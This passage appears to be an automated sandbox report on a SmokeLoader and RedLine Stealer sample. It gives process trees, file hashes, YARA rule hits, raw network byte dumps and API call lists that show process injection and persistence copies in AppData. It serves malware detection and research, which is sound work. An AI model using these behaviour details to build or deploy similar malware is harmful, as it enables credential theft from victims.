d$`D$D$L$D$D$L$H$L$D$D$L$D$2I;tHT$`HHIIMc_IGJAGH$H$H$HL$`Ld$`HL$`kMc_IWJTH2H
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: 85 ff 74 17 0f b6 32 48 ff c2 0f b6 d8 33 f3 c1 e8 08 33 44 b5 00 48 ff cf eb e4 5f 5e 5d 5b c3 53 55 56 57 8b c1 49 8b f8 49 8b e9 48 85 ff 0f 84 ba 00 00 00 48 f7 c2 07 00 00 00 74 17 0f b6 32 48 ff c2 0f b6 d8 33 f3 c1 e8 08 33 44 b5 00 48 ff cf 75 e0 48 83 ff 10 0f 82 90 00 00 00 48 03 fa 4c 8b c7 48 83 ef 08 48 83 e7 f8 48 2b d7 33 04 3a 66 66 66 66 66 0f 1f 84 00 00 00 00 00 0f b6 c8 0f b6 dc c1 e8 10 0f b6 f4 25 ff 00 00 00 8b 8c 8d 00 0c 00 00 33 4c 3a 04 33 8c 9d 00 08 00 00 33 4c b5 00 33 8c 85 00 04 00 00 0f b6 c1 0f b6 dd c1 e9 10 0f b6 f5 81 e1 ff 00 00 00 8b 84 85 00 0c 00 00 33 44 3a 08 33 84 9d 00 08 00 00 33 44 b5 00 33 84 8d 00 04 00 00 48 83 c2 08 75 9d 33 04 3a 48 8b d7 49 8b f8 48 2b fa 48 85 ff 74 17 0f b6 32 48 ff c2 0f b6 d8 33 f3 Data Ascii: t2H33DH_^][SUVWIIHHt2H33DHuHHLHHH+3:fffff%3L:33L33D:33D3Hu3:HIH+Ht2H3
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: 20 54 19 00 20 34 18 00 20 01 14 00 19 e0 17 d0 15 c0 00 00 01 1d 0c 00 1d 74 15 00 1d 64 14 00 1d 54 13 00 1d 34 12 00 1d d2 19 e0 17 d0 15 c0 01 0c 04 00 0c 34 0a 00 0c 72 08 70 01 06 02 00 06 92 02 30 01 17 09 00 17 64 5e 00 17 54 5d 00 17 34 5c 00 17 01 5a 00 10 70 00 00 01 1a 06 00 1a 34 0f 00 1a 92 16 70 15 60 14 50 01 0d 05 00 0d 34 3c 00 0d 01 3a 00 06 70 00 00 01 17 09 00 17 64 1a 00 17 54 19 00 17 34 18 00 17 01 16 00 10 70 00 00 01 12 07 00 12 64 37 00 12 34 36 00 12 01 34 00 0b 70 00 00 01 0f 06 00 0f 54 13 00 0f 34 12 00 0f d2 0b 70 01 15 08 00 15 74 0f 00 15 64 0d 00 15 34 0c 00 15 92 11 c0 01 1c 0c 00 1c 64 0c 00 1c 54 0b 00 1c 34 0a 00 1c 32 18 f0 16 e0 14 d0 12 c0 10 70 01 0a 04 00 0a 34 0a 00 0a 72 06 70 01 1f 0d 00 1f 64 70 00 1f 54 6f Data Ascii: T 4 tdT44rp0d^T]4\Zp4p`P4<:pdT4pd7464pT4ptd4dT42p4rpdpTo

Target ID:	0
Start time:	13:17:00
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\HaPJ2rPP6w.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HaPJ2rPP6w.exe"
Imagebase:	0x400000
File size:	229'888 bytes
MD5 hash:	08E3912BD337BFF072BD1346DDC39F3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:17:08
Start date:	04/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:17:28
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Roaming\wideaec
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wideaec
Imagebase:	0x400000
File size:	229'888 bytes
MD5 hash:	08E3912BD337BFF072BD1346DDC39F3A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:18:03
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\C12E.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C12E.exe
Imagebase:	0x400000
File size:	231'936 bytes
MD5 hash:	49A8BAC4600ABA0061CD216A4C75185C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:18:16
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\89ED.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\89ED.exe
Imagebase:	0x140000000
File size:	2'021'096 bytes
MD5 hash:	FBFC7A6D58571AF46628818A232931A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:18:17
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\89ED.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\89ED.exe" -sfxelevation
Imagebase:
File size:	2'021'096 bytes
MD5 hash:	FBFC7A6D58571AF46628818A232931A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	13:18:33
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Roaming\bbdeaec
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\bbdeaec
Imagebase:	0x400000
File size:	231'936 bytes
MD5 hash:	49A8BAC4600ABA0061CD216A4C75185C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:20:01
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Roaming\bbdeaec
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\bbdeaec
Imagebase:	0x400000
File size:	231'936 bytes
MD5 hash:	49A8BAC4600ABA0061CD216A4C75185C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	13:20:01
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Roaming\wideaec
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wideaec
Imagebase:	0x400000
File size:	229'888 bytes
MD5 hash:	08E3912BD337BFF072BD1346DDC39F3A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	28.2%
Signature Coverage:	42%
Total number of Nodes:	174
Total number of Limit Nodes:	6

Executed Functions

Function 004167C0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 299
windowtimefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004168DA
GetFocus.USER32 ref: 004168E0
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004168ED
FindAtomW.KERNEL32(00000000), ref: 004168F4
SetConsoleMode.KERNEL32(00000000,00000000), ref: 004168FC
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00416923
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041692C
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00416942
GetEnvironmentStringsW.KERNEL32 ref: 00416948
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041698D
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041699C
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004169A5
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004169BA
ReleaseMutex.KERNEL32(00000000), ref: 004169CA
SetCommState.KERNELBASE(00000000,00000000), ref: 004169F4
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00416A25
GetComputerNameW.KERNEL32(?,?), ref: 00416A39
GetFileAttributesA.KERNEL32(00000000), ref: 00416A40
GetConsoleAliasExesLengthA.KERNEL32 ref: 00416A46
GetBinaryType.KERNEL32(0041834C,?), ref: 00416A58
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00416A6B
GetLongPathNameW.KERNEL32(00418360,?,00000000), ref: 00416A7E
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00416A86
LoadLibraryW.KERNELBASE(00418374), ref: 00416B12

Strings

k`, xrefs: 00416B4D
}$, xrefs: 00416B71

Memory Dump Source

Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd

Similarity

API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
String ID: k`$}$
API String ID: 4079765171-956986773
Opcode ID: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
Instruction ID: 66b7ba66da8bb5d3bd80010fb135f4a1ed8397abbfee7ed1f5eca20cf58200d5
Opcode Fuzzy Hash: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
Instruction Fuzzy Hash: 6DA1D571846624ABC720EB61DC45BDF7B78EF4D314F0180AAF609A3161DB385A85CBED

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 00851503 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0085152B
Module32First.KERNEL32(00000000,00000224), ref: 0085154B

Memory Dump Source

Source File: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84e000_HaPJ2rPP6w.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2c51e01abfa8b481ba24bbd56e9ed2e3b715addadc2ea28069758071056cc2db
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D1F068352007156FDF203BB9988DB6E76E8FF89726F100528EA43D10C0DB70ED494651

Function 006B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D

Strings

cess, xrefs: 006B018D
kernel32.dll, xrefs: 006B008F, 006B0095

Memory Dump Source

Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14

Function 00416AE6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
libraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00418374), ref: 00416B12
MoveFileA.KERNEL32(00000000,00000000), ref: 00416B47
InterlockedDecrement.KERNEL32(?), ref: 00416B6A

Strings

k`, xrefs: 00416B4D
}$, xrefs: 00416B71

Memory Dump Source

Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd

Similarity

API ID: DecrementFileInterlockedLibraryLoadMove
String ID: k`$}$
API String ID: 418655872-956986773
Opcode ID: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
Instruction ID: 42061d5068bdce50c1bf5091c343343de5c0ff0e781990f509a1e5bc66fdcea5
Opcode Fuzzy Hash: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
Instruction Fuzzy Hash: AB2126349882208BCB20DB60DC457DABB60FB48319F1244BFEA49D7290CA38ADC4C79D

Function 004164D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00511CE8), ref: 004165AF
GetProcAddress.KERNEL32(00000000,0041C210), ref: 004165EC
VirtualProtect.KERNELBASE(00511B2C,00511CE4,00000040,?), ref: 0041660B

Strings

, xrefs: 00416515

Memory Dump Source

Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
Instruction ID: 5d6b8529abac6a2ef6dc9a1a277ef6d20b5afcabe6b96dcf33e4d09f3920d241
Opcode Fuzzy Hash: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
Instruction Fuzzy Hash: 00310310AD8781CBE301CBE8FC447813A62AB35748F04C0E89648873B5D7BE5A58D7AE

Function 006B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E

Memory Dump Source

Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

